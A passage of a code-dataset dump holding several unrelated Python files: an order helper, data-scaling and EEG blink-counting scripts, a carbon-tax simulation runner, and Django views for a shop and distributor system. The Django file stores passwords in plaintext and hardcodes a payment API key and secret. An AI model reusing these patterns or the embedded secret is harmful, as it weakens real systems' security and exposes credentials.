PizzaName.SPECIAL.value:\n message = \"\"\n elif not self.pizzaOrderHandler.isCurrentPizzaToppable():\n message = \"All toppings added!\"\n else:\n message = \"Please order an eligible pizza to put topping on.\"\n\n return message\n", "repo_name": "zseen/cs50-web", "sub_path": "project3/orders/helpers/PizzaOrderHandler.py", "file_name": "PizzaOrderHandler.py", "file_ext": "py", "file_size_in_byte": 3942, "program_lang": "python", "lang": "en", "doc_type": 
"code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 7, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 12, "usage_type": "name"}, {"api_name": "orders.models.FoodOrderItem", "line_number": 29, "usage_type": "call"}, {"api_name": "orders.models.ToppingOrderItem", "line_number": 49, "usage_type": "call"}, {"api_name": "orders.models.ToppingOrderItem.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "orders.models.ToppingOrderItem.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "orders.models.ToppingOrderItem", "line_number": 58, "usage_type": "name"}, {"api_name": "orders.models.FoodOrderItem.objects.filter", "line_number": 68, "usage_type": "call"}, {"api_name": "orders.models.FoodOrderItem.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "orders.models.FoodOrderItem", "line_number": 68, "usage_type": "name"}, {"api_name": "orders.models.ToppingOrderItem.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "orders.models.ToppingOrderItem.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "orders.models.ToppingOrderItem", "line_number": 70, "usage_type": "name"}, {"api_name": "orders.models.FoodOrderItem.objects.filter", "line_number": 93, "usage_type": "call"}, {"api_name": "orders.models.FoodOrderItem.objects", "line_number": 93, "usage_type": "attribute"}, {"api_name": "orders.models.FoodOrderItem", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "5944909271", "text": "from pandas import DataFrame, concat\nfrom pandas.plotting import register_matplotlib_converters\nfrom global_var import * \nfrom ds_charts import get_variable_types\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom matplotlib.pyplot import subplots, show\n\n\n\ndef Standart_Scaler_zscore(file,data,numeric_vars,df_nr,df_sb,df_bool):\n transf = StandardScaler(with_mean=True, with_std=True, copy=True).fit(df_nr)\n tmp = DataFrame(transf.transform(df_nr), index=data.index, columns= numeric_vars)\n norm_data_zscore = concat([tmp, df_sb, df_bool], axis=1)\n #norm_data_zscore.to_csv(f'../../data/week2/{file}_scaled_zscore.csv', index=False)\n #print(norm_data_zscore.describe())\n\n\ndef MinMaxScaler_(file,data,numeric_vars,df_nr,df_sb,df_bool):\n transf = MinMaxScaler(feature_range=(0, 1), copy=True).fit(df_nr)\n tmp = DataFrame(transf.transform(df_nr), index=data.index, columns= numeric_vars)\n norm_data_minmax = concat([tmp, df_sb, df_bool], axis=1)\n norm_data_minmax.to_csv(f'../../data/week2/{file}_scaled_minmax.csv', index=False)\n print(norm_data_minmax.describe())\n\ndef scalling(file,data):\n variable_types = get_variable_types(data)\n numeric_vars = variable_types['Numeric']\n symbolic_vars = variable_types['Symbolic']\n boolean_vars = variable_types['Binary']\n\n df_nr = data[numeric_vars] #table with numeric vars\n df_sb = data[symbolic_vars] #table with symbolic vars\n df_bool = data[boolean_vars] #table with bool vars\n\n #Standart_Scaler_zscore(file,data,numeric_vars,df_nr,df_sb,df_bool)\n MinMaxScaler_(file,data,numeric_vars,df_nr,df_sb,df_bool)\n\n\n\ndef main():\n data_health,data_climate = gbVar()\n \n #scalling(filename_h,data_health)\n scalling(filename_c,data_climate)\n\n\nif __name__==\"__main__\":\n main()", "repo_name": "VicesLorenzo/CDados2223", "sub_path": "code/scaling.py", "file_name": "scaling.py", "file_ext": "py", "file_size_in_byte": 1797, "program_lang": "python", "lang": "en", "doc_type": "code", 
"stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 21, "usage_type": "call"}, {"api_name": "ds_charts.get_variable_types", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "17729812719", "text": "#coding: latin-1\n#\n# STEM - Blinking Counter\n\n# Este programa es un ejemplo de utilizacion de python para implementar un simple\n# contador de penstaneos basados en una senal de EMG/EMG/EOG.\n#\n# Frecuencia de sampleo Fs = 128\n#\n\nimport csv\nimport numpy as np\n\n\nresults = []\n\n# Esta primera linea, abre el archivo 'blinking.dat' que se grabó\n# al establecerse la conexión con el servidor.\nwith open('data/blinking.dat') as inputfile:\n for row in csv.reader(inputfile):\n rows = row[0].split(' ')\n results.append(rows[1:])\n\nprint ('Longitud del archivo:'+str(len(results)))\n\n# Convert the file into numpy array of ints.\nresults = np.asarray(results)\nresults = results.astype(int)\n\n# Strip from the signal anything you want\n\n\n# La primer columna corresponde a el largo del archivo a considerar\n# en relación a las muestras (1:100 serian las muestras) representante\n# del tiempo.\n# La segunda columna, corresponde a: eeg, attention y meditation.\neeg = results[1:,1]\n\nprint (eeg)\n\n#eeg = np.zeros((64))\n\n#eeg = np.arange(64)\n\n#print eeg.shape\n\n#eeg[32] = -60\n\n#eeg[43] = -130\n\n#eeg = eeg - baseline_als(eeg,10000,0.5)\n\n\nimport matplotlib.pyplot as plt\nfig = plt.figure()\nax1 = fig.add_subplot(111)\n\nax1.plot(eeg,'r', label='EEG')\nplt.legend(loc='upper left');\nplt.show()\n\n\n# El threshold corresponde al limite en amplitud a considerar para discriminar\n# que es un pestañeo de qué no lo es.\nsignalthreshold = 420\n\n\n\nboolpeaks = np.where( eeg > signalthreshold )\nprint (boolpeaks)\ndpeaks = np.diff( eeg )\nprint (dpeaks)\npdpeaks = np.where( dpeaks > 0)\nprint (pdpeaks)\nprint (pdpeaks != 0)\na = np.in1d(pdpeaks,boolpeaks)\nprint (a)\nblinkings = a.sum()\n\nprint ('Blinkings: %d' % blinkings)\n\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks\n\npeaks, _ = find_peaks(eeg, height=200)\nplt.plot(eeg)\nplt.plot(peaks, eeg[peaks], \"x\")\nplt.plot(np.zeros_like(eeg), \"--\", color=\"gray\")\nplt.show()", "repo_name": "gabrielamendezg/python-scientific", "sub_path": "contadoreventos.py", "file_name": "contadoreventos.py", "file_ext": "py", "file_size_in_byte": 1924, "program_lang": "python", "lang": "es", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": 
"numpy.where", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 76, "usage_type": "call"}, {"api_name": "scipy.signal.find_peaks", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}]} +{"seq_id": "33749892522", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 4 14:17:32 2022\n\n@author: simonl\n\"\"\"\n\nmain_path = './'\nimport sys\nsys.path.append(main_path+'lib/')\nimport solver_funcs as s\nimport data_funcs as d\nfrom tqdm import tqdm\nimport numpy as np\n# from deco import *\nimport time\nfrom time import perf_counter\nfrom multiprocessing import Pool\nfrom multiprocessing import Manager\n\ndir_num = 5\ndata_path = main_path+'data/'\nresults_path = 'results/'\n\nnumeraire_type = 'wage'\nnumeraire_country = 'USA'\n\nEEA = d.countries_from_fta('EEA')\nEU = d.countries_from_fta('EU')\nNAFTA = d.countries_from_fta('NAFTA')\nASEAN = d.countries_from_fta('ASEAN')\nAANZFTA = d.countries_from_fta('AANZFTA')\nAPTA = d.countries_from_fta('APTA')\nMERCOSUR = d.countries_from_fta('MERCOSUR')\n\n# carb_cost_list = np.append(np.linspace(0,2.5e-4,251),np.linspace(2.5e-4,1e-3,76)[1:])[46:]\ncarb_cost_list = np.linspace(0,1e-4,5)\n# eta_path = ['elasticities_agg1.csv','elasticities_agg2.csv','uniform_elasticities_4.csv']\n# sigma_path = ['elasticities_agg1.csv','elasticities_agg2.csv','uniform_elasticities_4.csv']\neta_path = ['elasticities_agg1.csv']\nsigma_path = ['uniform_elasticities_4.csv']\n# carb_cost_list = [4.6e-4]\ntaxed_countries_list = [None]\n# taxing_countries_list = [None,EU,NAFTA,ASEAN,AANZFTA,APTA,EEA,MERCOSUR,\n# ['USA'],['CHN'],\n# EEA+NAFTA,EEA+ASEAN,EEA+APTA,EEA+AANZFTA,EEA+['USA'],EEA+['CHN'],\n# NAFTA+APTA,NAFTA+MERCOSUR,\n# APTA+AANZFTA,EU+NAFTA+['CHN'],EU+NAFTA+APTA]\ntaxing_countries_list = [None]\ntaxed_sectors_list = [None]\nspecific_taxing_list = [None]\nfair_tax_list = [False]\n\ncases = d.build_cases(eta_path,sigma_path,carb_cost_list,taxed_countries_list,taxing_countries_list,\n taxed_sectors_list,specific_taxing_list,fair_tax_list)\n\nyears = [2018]\n\n# @concurrent\n# def work(baseline, data_path,results_path,dir_num, simulation_case):\n# params = d.params(data_path, **simulation_case)\n# params.num_scale_carb_cost(baseline.num, inplace = True)\n \n# if not params.fair_tax:\n# results = s.solve_E_p(params, baseline)\n \n# if params.fair_tax:\n# results = s.solve_fair_tax(params, baseline)\n \n# #compute some aggregated solution quantities to write directly in runs report\n# emissions_sol, utility, utility_countries = s.compute_emissions_utility(results, params, baseline)\n \n# # d.write_solution_csv(results,results_path,dir_num,emissions_sol,utility,params,baseline)\n\n# 
@synchronized\n# def run(baseline, data_path,results_path,dir_num, cases):\n# for i,simulation_case in enumerate(cases):\n# work(baseline, data_path,results_path,dir_num, simulation_case)\n\n \ndef one_run(data_tuple):\n baseline, data_path, results_path, dir_num, simulation_case = data_tuple\n print(simulation_case['carb_cost'], flush=True)\n params = d.params(data_path, **simulation_case)\n params.num_scale_carb_cost(baseline.num, inplace = True)\n \n if not params.fair_tax:\n results = s.solve_E_p(params, baseline)\n \n if params.fair_tax:\n results = s.solve_fair_tax(params, baseline)\n \n #compute some aggregated solution quantities to write directly in runs report\n emissions_sol, utility, utility_countries = s.compute_emissions_utility(results, params, baseline)\n \n d.write_solution_csv(results,results_path,dir_num,emissions_sol,utility,params,baseline)\n return simulation_case['carb_cost']\n \n# if __name__ == '__main__': \nt1 = perf_counter()\n# for y in years:\ny=2018 \nyear=str(y)\n\nbaseline = d.baseline(year, data_path)\n\nbaseline.num_scale(numeraire_type, numeraire_country, inplace = True)\n\nbaseline.make_np_arrays(inplace = True)\n\nbaseline.compute_shares_and_gammas(inplace = True)\n\n# run(baseline, data_path,results_path,dir_num, cases)\n\n# p = Pool()\n# data = [(baseline, data_path, results_path, dir_num, simulation_case) for simulation_case in cases]\n# manager = Manager()\n# data = manager.list([(baseline, data_path, results_path, dir_num, simulation_case) for simulation_case in cases])\n# start = time.time()\n# for dat in p.map_async(one_run, data).get():\n# print(\"{} (Time elapsed: {}s)\".format(dat, int(time.time() - start)),flush=True)\n # results = p.imap_unordered(one_run, data)\nfor simulation_case in tqdm(cases):\n \n params = d.params(data_path, **simulation_case)\n params.num_scale_carb_cost(baseline.num, inplace = True)\n \n if not params.fair_tax:\n results = s.solve_E_p(params, baseline)\n \n if params.fair_tax:\n results = s.solve_fair_tax(params, baseline)\n \n #compute some aggregated solution quantities to write directly in runs report\n emissions_sol, utility, utility_countries = s.compute_emissions_utility(results, params, baseline)\n \n d.write_solution_csv(results,results_path,dir_num,emissions_sol,utility,params,baseline)\nt2 = perf_counter()\nprint(t2-t1)", "repo_name": "todortodor/tax_mod_gh", "sub_path": "main_opti_v1_parallel.py", "file_name": "main_opti_v1_parallel.py", "file_ext": "py", "file_size_in_byte": 4977, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 29, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 30, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 31, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 32, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 33, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 34, "usage_type": "call"}, {"api_name": "data_funcs.countries_from_fta", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "data_funcs.build_cases", "line_number": 55, "usage_type": "call"}, 
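The commented-out Pool/Manager code above sketches the parallel path this script was evolving toward. One hedged way to wire one_run into a process pool, assuming baseline and the case dicts pickle cleanly; processes=4 is an arbitrary choice:

```python
from multiprocessing import Pool

if __name__ == '__main__':
    data = [(baseline, data_path, results_path, dir_num, case) for case in cases]
    with Pool(processes=4) as pool:
        # one_run returns the carb_cost of each finished simulation
        for carb_cost in pool.imap_unordered(one_run, data):
            print(f'finished carb_cost={carb_cost}', flush=True)
```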
{"api_name": "data_funcs.params", "line_number": 85, "usage_type": "call"}, {"api_name": "solver_funcs.solve_E_p", "line_number": 89, "usage_type": "call"}, {"api_name": "solver_funcs.solve_fair_tax", "line_number": 92, "usage_type": "call"}, {"api_name": "solver_funcs.compute_emissions_utility", "line_number": 95, "usage_type": "call"}, {"api_name": "data_funcs.write_solution_csv", "line_number": 97, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 101, "usage_type": "call"}, {"api_name": "data_funcs.baseline", "line_number": 106, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 124, "usage_type": "call"}, {"api_name": "data_funcs.params", "line_number": 126, "usage_type": "call"}, {"api_name": "solver_funcs.solve_E_p", "line_number": 130, "usage_type": "call"}, {"api_name": "solver_funcs.solve_fair_tax", "line_number": 133, "usage_type": "call"}, {"api_name": "solver_funcs.compute_emissions_utility", "line_number": 136, "usage_type": "call"}, {"api_name": "data_funcs.write_solution_csv", "line_number": 138, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "41620805794", "text": "from datetime import datetime\nfrom django.core.files.storage import FileSystemStorage\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\nfrom sms.models import *\ndef mainpg(request):\n return render(request, 'homindex.html')\ndef logout(request):\n return render(request, 'homindex.html')\ndef logincode(request):\n return render(request, 'loginindex.html')\ndef logins(request):\n username = request.POST['textfield']\n password = request.POST['textfield2']\n try:\n ob = login.objects.get(username=username, password=password)\n if ob.type == 'admin':\n return HttpResponse('''''')\n elif ob.type == 'distributor':\n request.session['lid']=ob.id\n return HttpResponse('''''')\n elif ob.type == 'shopowner':\n request.session['lid'] = ob.id\n return HttpResponse('''''')\n else:\n return HttpResponse('''''')\n except:\n return HttpResponse('''''')\ndef update_prod(request,id):\n ob=product.objects.get(id=id)\n request.session['prid']=id\n obb=category.objects.all()\n return render(request, 'edit_delete product.html',{'val':ob,'v':obb})\ndef update(request):\n try:\n Product_Name = request.POST['textfield']\n Category = request.POST['select']\n Quantity = request.POST['textfield2']\n Tax = request.POST['textfield3']\n Price = request.POST['textfield4']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name, image)\n iob = product.objects.get(id=request.session['prid'])\n iob.name = Product_Name\n iob.cid = category.objects.get(id=Category)\n iob.quantity = Quantity\n iob.Tax = Tax\n iob.price = Price\n iob.image = fs\n iob.save()\n return HttpResponse('''''')\n except:\n Product_Name = request.POST['textfield']\n Quantity = request.POST['textfield2']\n Tax = request.POST['textfield3']\n Price = request.POST['textfield4']\n Category = request.POST['select']\n print(Category,\"+++++++++++++++++++\")\n iob = product.objects.get(id=request.session['prid'])\n iob.name = Product_Name\n iob.cid = category.objects.get(id=Category)\n iob.quantity = Quantity\n iob.Tax = Tax\n iob.price = Price\n iob.save()\n return HttpResponse('''''')\n\ndef delete_prod(request,id):\n ob=product.objects.get(id=id)\n ob.delete()\n return HttpResponse('''''')\ndef add_prod(request):\n ob = category.objects.all()\n return render(request, 'add 
product.html',{'val':ob})\ndef prdct(request):\n Product_Name = request.POST['textfield'] \n Category = request.POST['select']\n Quantity = request.POST['textfield2']\n MRP = request.POST['textfield3']\n Price = request.POST['textfield4']\n Stock = request.POST['textfield5']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name,image)\n iob = product()\n iob.name=Product_Name\n iob.did=dis_registration.objects.get(lid__id=request.session['lid'])\n iob.cid=category.objects.get(id=Category)\n iob.quantity=Quantity\n iob.MRP=MRP\n iob.price=Price\n iob.stock=Stock\n iob.image=fs\n iob.save()\n return HttpResponse('''''')\ndef ctgry(request):\n return render(request, 'category.html')\ndef addcat(request):\n Category_name = request.POST['textfield']\n GST = request.POST['textfield2']\n Discription = request.POST['textarea']\n iob=category()\n iob.category_name = Category_name\n iob.GST = GST\n iob.discription = Discription\n iob.save()\n return HttpResponse('''''')\ndef cat_list(request):\n ob=category.objects.all()\n return render(request, 'view category.html',{'val':ob})\n\n\n\ndef dis_reg(request):\n return render(request, 'reg distributor index.html')\ndef disbtr(request):\n Name = request.POST['textfield']\n Place = request.POST['textfield2']\n Email = request.POST['textfield3']\n Mobile = request.POST['textfield4']\n username = request.POST['textfield5']\n password = request.POST['textfield6']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name,image)\n ob = login()\n ob.username=username\n ob.password=password\n ob.type = 'pending'\n ob.save()\n iob = dis_registration()\n iob.name=Name\n iob.location=Place\n iob.mobile_number=Mobile\n iob.email=Email\n iob.lid=ob\n iob.image=fs\n iob.save()\n return HttpResponse('''''')\n\ndef accept(request,id):\n ob=login.objects.get(id=id)\n ob.type='distributor'\n ob.save()\n return HttpResponse('''''')\n\ndef reject(request,id):\n ob=login.objects.get(id=id)\n ob.type='reject'\n ob.save()\n return HttpResponse('''''') \n\ndef admin_hom(request):\n return render(request, 'admin home page.html')\ndef bill_pg(request):\n ob=bill.objects.filter(sid__lid__id=request.session['lid'])\n return render(request, 'bill.html',{'val':ob})\ndef bill_pg2(request,id):\n ob=billdetails.objects.filter(bid__id=id)\n return render(request, 'bill2.html',{'val':ob})\ndef complt_pg(request):\n ob=complaints.objects.all()\n return render(request, 'distributor complaint.html',{'val':ob})\ndef complt_pg1(request):\n ob=complaints.objects.all()\n return render(request, 'complaint.html',{'val':ob})\ndef cmplt(request):\n ob=dis_registration.objects.all()\n return render(request, 'add complaint.html',{'val':ob})\ndef addcmplt(request):\n dis = request.POST['select']\n complaint = request.POST['textarea']\n ob=complaints()\n ob.did=dis_registration.objects.get(id=dis)\n ob.lid=shop_registration.objects.get(lid__id=request.session['lid'])\n ob.complaint=complaint\n ob.date=datetime.today()\n ob.reply='pending'\n ob.save()\n return HttpResponse('''''')\ndef viewreply(request):\n ob=complaints.objects.filter(lid__lid__id=request.session['lid'])\n\n return render(request, 'view reply.html',{'val':ob})\ndef dis_hom(request):\n ob=dis_registration.objects.get(lid__id=request.session['lid'])\n request.session['name']=ob.name\n return render(request, 'dis home page.html')\ndef feedb_pg(request):\n\n ob=feedback.objects.all()\n return render(request, 'feedback form.html',{'val':ob})\ndef fdbk(request):\n Feedback = 
request.POST['textarea']\n obb=feedback()\n obb.date=datetime.today()\n obb.feedback=Feedback\n obb.sid=shop_registration.objects.get(lid__id=request.session['lid'])\n obb.save()\n return HttpResponse('''''')\ndef mng_shop(request):\n ob=dis_registration.objects.all()\n return render(request, 'shoporder.html',{'val':ob})\n\ndef user_order1(request):\n ob = category.objects.all()\n return render(request, 'userorder.html', {'val': ob})\ndef user_order2(request):\n ob = category.objects.all()\n cat=request.POST['select']\n ob1=order.objects.filter(pid__cid__id=cat,orderstatus='accept',sid__lid__id=request.session['lid'])\n return render(request, 'userorder.html', {'val': ob,'v':ob1,'c':int(cat)})\ndef user_order3(request,id):\n request.session['pid']=id\n ob1=order.objects.get(id=id)\n return render(request, 'nxt.html', {'i':ob1})\ndef order_info(request):\n btn=request.POST['button']\n qty=request.POST['qty']\n from django.db.models import Max\n cqty=order.objects.get(id=request.session['pid'])\n # cqty.stock = int(cqty.stock) - int(qty)\n if int(cqty.stock) > int(qty):\n if btn == \"NEXT\":\n bb = bill.objects.filter(status='pending',sid__lid__id=request.session['lid']).aggregate(max=Max('id'))\n print(bb,\"=================\")\n if bb['max'] is None:\n ob=bill()\n ob.sid=shop_registration.objects.get(lid__id=request.session['lid'])\n ob.total_amount='0'\n ob.date=datetime.today()\n ob.status='pending'\n ob.save()\n ob1=billdetails()\n ob1.pid=order.objects.get(id=request.session['pid'])\n ob1.bid=bill.objects.get(id=ob.id)\n ob1.quantity=qty\n ob1.status='ordered'\n ob1.save()\n return redirect('/user_order1')\n else:\n ob1 = billdetails()\n ob1.pid = order.objects.get(id=request.session['pid'])\n ob1.bid = bill.objects.get(id=bb['max'])\n ob1.quantity = qty\n ob1.status = 'ordered'\n ob1.save()\n return redirect('/user_order1')\n else:\n bb = bill.objects.filter(status='pending',sid__lid__id=request.session['lid']).aggregate(max=Max('id'))\n cqty = order.objects.get(id=request.session['pid'])\n cqty.stock = int(cqty.stock) - int(qty)\n cqty.save()\n if bb['max'] is None:\n ob=bill()\n ob.sid=shop_registration.objects.get(lid__id=request.session['lid'])\n ob.total_amount='0'\n ob.date=datetime.today()\n ob.status='pending'\n ob.save()\n ob1=billdetails()\n ob1.pid=order.objects.get(id=request.session['pid'])\n ob1.bid=bill.objects.get(id=ob.id)\n ob1.quantity=qty\n ob1.status='ordered'\n ob1.save()\n aa = bill.objects.get(id=ob.id)\n s = billdetails.objects.filter(bid__id=ob.id)\n gob = billdetails.objects.filter(bid__id=ob.id).values('pid__pid__cid').distinct()\n print(gob, \"$$$$$$$$$$$$$$$$$$$$\")\n gst = 0\n for k in gob:\n qp = category.objects.get(id=k['pid__pid__cid'])\n gst = gst + int(qp.GST)\n print(gst, \"ggggsssssssssssssssssttttttttttttttttttt\")\n tot = 0\n for i in s:\n rs = int(i.quantity) * int(i.pid.pid.MRP)\n print(rs, \"***********\")\n tot = tot + rs\n print(tot, \"==================================================\")\n request.session['tot'] = tot\n fob = bill.objects.get(id=ob.id)\n fob.total_amount = tot\n fob.save()\n request.session['bill_id'] = ob.id\n gtot=int(tot)*int(gst)/100\n famt=int(tot)+int(gtot)\n print(gtot,famt,\"=====================\")\n return render(request, 'bill_data.html', {'bid': aa.id, 'val': s, 'tot': tot,'gst':gst,'gtot':famt})\n else:\n ob1 = billdetails()\n ob1.pid = order.objects.get(id=request.session['pid'])\n ob1.bid = bill.objects.get(id=bb['max'])\n ob1.quantity = qty\n ob1.status = 'ordered'\n ob1.save()\n aa = 
bill.objects.get(id=bb['max'])\n s = billdetails.objects.filter(bid__id=bb['max'])\n gob = billdetails.objects.filter(bid__id=bb['max']).values('pid__pid__cid').distinct()\n print(gob, \"$$$$$$$$$$$$$$$$$$$$\")\n gst = 0\n for k in gob:\n qp = category.objects.get(id=k['pid__pid__cid'])\n gst = gst + int(qp.GST)\n print(gst, \"ggggsssssssssssssssssttttttttttttttttttt\")\n tot = 0\n for i in s:\n rs = int(i.quantity) * int(i.pid.pid.MRP)\n print(rs, \"***********\")\n tot = tot + rs\n print(tot, \"==================================================\")\n request.session['tot'] = tot\n fob = bill.objects.get(id=bb['max'])\n fob.total_amount = tot\n fob.save()\n request.session['bill_id'] = bb['max']\n gtot = int(tot) * int(gst) / 100\n famt = int(tot) + int(gtot)\n print(gtot, famt, \"=====================\")\n return render(request, 'bill_data.html', {'bid': aa.id, 'val': s, 'tot': tot,'gst':gst,'gtot':famt})\n else:\n return HttpResponse('''''')\ndef paymt(request):\n import razorpay\n fob = bill.objects.get(id=request.session['bill_id'])\n fob.status = 'paid'\n fob.save()\n amount = request.session['tot']\n client = razorpay.Client(auth=(\"rzp_test_edrzdb8Gbx5U5M\", \"XgwjnFvJQNG6cS7Q13aHKDJj\"))\n print(client)\n payment = client.order.create({'amount': str(amount) + \"00\", 'currency': \"INR\", 'payment_capture': '1'})\n return render(request,'UserPayProceed.html',{'p':payment})\ndef on_payment_success(request):\n return HttpResponse('''''')\ndef searchandviewprdcts(request):\n ob = dis_registration.objects.all()\n dis=request.POST['select']\n obb=product.objects.filter(did__id=dis)\n return render(request, 'shoporder.html', {'val': ob,'val1':obb,'d':int(dis)})\ndef odr_pg(request,id):\n request.session['prdctid']=id\n return render(request, 'oorder.html')\ndef orderproduct(request):\n qty=request.POST['textfield']\n pob=product.objects.get(id=request.session['prdctid'])\n if(int(pob.stock)>int(qty)):\n ob1=order.objects.filter(sid__lid__id=request.session['lid'])\n for i in ob1:\n ob = order.objects.get(id=i.id)\n total = int(ob.stock) * int(ob.pid.price)\n # disnt = int(ob.pid.MRP) - int(ob.pid.price)\n gtot = int(total) * int(ob.pid.cid.GST) / 100\n famt = int(total) + int(gtot)\n if int(famt) <= int(ob.amt):\n ck = 1\n else:\n ck = 0\n print(ck, \"============================\")\n damt = int(famt) - int(ob.amt)\n print(damt,\"======================\")\n if(int(damt) > 5000):\n ob = order()\n ob.date = datetime.today()\n ob.pid = product.objects.get(id=request.session['prdctid'])\n ob.sid = shop_registration.objects.get(lid__id=request.session['lid'])\n ob.orderstatus = 'pending'\n ob.stock = qty\n ob.amt = '0'\n ob.save()\n return HttpResponse('''''')\n else:\n return HttpResponse('''''')\n else:\n return HttpResponse('''''')\n\n\ndef accept(request,id):\n ob=login.objects.get(id=id)\n ob.type='distributor'\n ob.save()\n return HttpResponse('''''')\ndef reject(request,id):\n ob=login.objects.get(id=id)\n ob.type='reject'\n ob.save()\n return HttpResponse('''''')\ndef prd_list(request):\n ob=product.objects.filter(did__lid__id=request.session['lid'])\n return render(request, 'product list.html',{'val':ob})\ndef stock_info(request):\n from django.db.models import Sum\n ob = order.objects.filter(sid__lid__id=request.session['lid']).values('pid__name','pid__did__name','pid__price').order_by('pid__id').annotate(sum=Sum('stock'))\n print(ob,\"========\")\n return render(request,'stock_info.html',{'val':ob})\n# def rpt(request):\n# return HttpResponse('''''')\ndef rply_pg(request,id):\n 
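The on_payment_success view above trusts the checkout callback without any check. A hedged sketch of verifying Razorpay's signature before treating a bill as paid; the POST field names follow Razorpay's standard checkout callback and the credentials are placeholders:

```python
import razorpay
from razorpay.errors import SignatureVerificationError

def is_payment_genuine(request):
    client = razorpay.Client(auth=("rzp_test_key", "rzp_test_secret"))  # placeholders
    params = {
        'razorpay_order_id': request.POST.get('razorpay_order_id'),
        'razorpay_payment_id': request.POST.get('razorpay_payment_id'),
        'razorpay_signature': request.POST.get('razorpay_signature'),
    }
    try:
        client.utility.verify_payment_signature(params)  # raises on mismatch
        return True
    except SignatureVerificationError:
        return False  # do not mark the bill as paid
```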
request.session['cid']=id\n return render(request, 'reply form.html')\ndef sendreply(request):\n replys=request.POST['textfield'] \n ob=complaints.objects.get(id=request.session['cid'])\n ob.reply=replys\n ob.save()\n return HttpResponse('''''')\ndef retn(request):\n ob=order.objects.filter(pid__did__lid__id=request.session['lid'])\n return render(request,'return.html',{'v':ob})\ndef retn1(request):\n ob = category.objects.all()\n return render(request,'retrnlist.html', {'val': ob})\ndef returned(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='requested'\n ob.save()\n return HttpResponse('''''')\ndef retn2(request):\n ob = category.objects.all()\n cat = request.POST['select']\n ob1=order.objects.filter(pid__cid__id=cat,sid__lid__id=request.session['lid'])\n return render(request,'retrnlist.html', {'val': ob, 'v': ob1, 'c': int(cat)})\ndef sale_list(request):\n today=datetime.today()\n ob=bill.objects.filter(date=datetime.today(),sid__lid__id=request.session['lid']).count()\n ob1=bill.objects.filter(sid__lid__id=request.session['lid'],date__month=today.month,date__year=today.year).count()\n print(ob1,\"============\")\n tob=bill.objects.filter(sid__lid__id=request.session['lid'],date__year=today.year).count()\n a=bill.objects.filter(sid__lid__id=request.session['lid'],date=datetime.today())\n tot=0\n for i in a:\n tot=tot+int(i.total_amount)\n print(tot,\"***************\")\n s = bill.objects.filter(sid__lid__id=request.session['lid'],date__month=today.month,date__year=today.year)\n mob = 0\n for i in s:\n mob = mob + 